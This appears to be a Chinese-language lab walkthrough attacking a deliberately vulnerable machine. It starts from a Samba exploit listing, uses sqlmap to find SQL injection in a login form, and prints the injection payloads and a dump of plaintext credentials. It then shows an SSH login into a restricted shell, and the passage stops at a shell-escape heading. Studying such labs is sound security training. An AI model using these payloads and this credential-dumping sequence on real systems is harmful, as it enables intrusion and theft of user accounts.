Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                   | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)               | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)             | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                             | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                    | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                     | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)              | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                        | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                            | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                               | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                  | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                           | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                           | linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py
Sambar Server 4.3/4.4 Beta 3 - Search CGI                                            | windows/remote/20223.txt
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access                       | windows/remote/24163.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

---

三、渗透测试

3.1 SQL注入

3.1.1 Burp Suit抓登录包

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# vim sql.txt  ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# cat sql.txt  
POST /checklogin.php HTTP/1.1
Host: 192.168.1.6
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.6
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.6/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: closemyusername=admin&mypassword=123456&Submit=Login

3.1.2 爆破数据库

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --dbs_____H_____ ___[']_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:35:59 /2024-06-12/[09:35:59] [INFO] parsing HTTP request from 'sql.txt'
[09:36:00] [INFO] testing connection to the target URL
[09:36:00] [INFO] testing if the target URL content is stable
[09:36:00] [INFO] target URL content is stable
[09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
[09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[09:36:05] [INFO] testing 'Generic inline queries'
[09:36:05] [INFO] testing 'MySQL inline queries'
[09:36:05] [INFO] testing 'PostgreSQL inline queries'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:36:05] [INFO] testing 'Oracle inline queries'
[09:36:05] [INFO] testing 'SQLite inline queries'
[09:36:06] [INFO] testing 'Firebird inline queries'
[09:36:06] [INFO] testing 'ClickHouse inline queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:36:08] [INFO] testing 'Oracle AND time-based blind'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
[09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
[09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
[09:36:10] [INFO] testing 'Generic inline queries'
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
got a 302 redirect to 'http://192.168.1.6/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL inline queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:36:21] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
[09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
[09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
[09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
[09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
---
Parameter: mypassword (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=LoginType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:36:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:36:25] [INFO] fetching database names
[09:36:25] [INFO] fetching number of databases
[09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:25] [INFO] retrieved: 3
[09:36:25] [INFO] retrieved: information_schema
[09:36:26] [INFO] retrieved: members
[09:36:26] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql[09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'[*] ending @ 09:36:27 /2024-06-12/

获得数据库

• information_schema
• members
• mysql

3.1.3 当前连接的数据库

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --current-db _____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:42:14 /2024-06-12/[09:42:14] [INFO] parsing HTTP request from 'sql.txt'
[09:42:15] [INFO] resuming back-end DBMS 'mysql' 
[09:42:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=LoginType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:42:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:15] [INFO] fetching current database
[09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:42:15] [INFO] retrieved: members
current database: 'members'
[09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'[*] ending @ 09:42:15 /2024-06-12/

当前连接的数据库是

• members

3.1.4 连接的数据库的表名

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members --tables_____H_____ ___[']_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:45:10 /2024-06-12/[09:45:10] [INFO] parsing HTTP request from 'sql.txt'
[09:45:10] [INFO] resuming back-end DBMS 'mysql' 
[09:45:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=LoginType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:45:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:45:11] [INFO] fetching tables for database: 'members'
[09:45:11] [INFO] fetching number of tables for database 'members'
[09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:45:11] [INFO] retrieved: 1
[09:45:11] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+[09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'[*] ending @ 09:45:11 /2024-06-12/

连接的数据库是：members
表名是：members

3.1.5 字段名

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns_____H_____ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:48:22 /2024-06-12/[09:48:22] [INFO] parsing HTTP request from 'sql.txt'
[09:48:22] [INFO] resuming back-end DBMS 'mysql' 
[09:48:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=LoginType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:48:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:48:22] [INFO] fetching columns for table 'members' in database 'members'
[09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:48:22] [INFO] retrieved: 3
[09:48:22] [INFO] retrieved: id
[09:48:23] [INFO] retrieved: int(4)
[09:48:23] [INFO] retrieved: username
[09:48:23] [INFO] retrieved: varchar(65)
[09:48:24] [INFO] retrieved: password
[09:48:24] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+[09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'[*] ending @ 09:48:25 /2024-06-12/

获得字段名

• id
• password
• username

3.1.6 用户名和密码

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump_____H_____ ___[(]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:52:26 /2024-06-12/[09:52:26] [INFO] parsing HTTP request from 'sql.txt'
[09:52:26] [INFO] resuming back-end DBMS 'mysql' 
[09:52:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=LoginType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
[09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
[09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:26] [INFO] retrieved: 2
[09:52:26] [INFO] retrieved: 1
[09:52:26] [INFO] retrieved: MyNameIsJohn
[09:52:27] [INFO] retrieved: john
[09:52:27] [INFO] retrieved: 2
[09:52:27] [INFO] retrieved: ADGAds
[09:52:28] [INFO] retrieved: 
[09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                        
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[09:52:43] [INFO] adjusting time delay to 1 second due to good response times
robert
Database: members
Table: members
[2 entries]
+----+----------+--------------+
| id | username | password     |
+----+----------+--------------+
| 1  | john     | MyNameIsJohn |
| 2  | robert   | ADGAds       |
+----+----------+--------------+

获得用户名和密码

用户名	密码
john	MyNameIsJohn
robert	ADGAds

3.2 shell逃逸

3.2.1 ssh登录

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

登录shell成功

3.2.2 shell逃逸

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.Type `help' to learn how to use Xshell prompt.
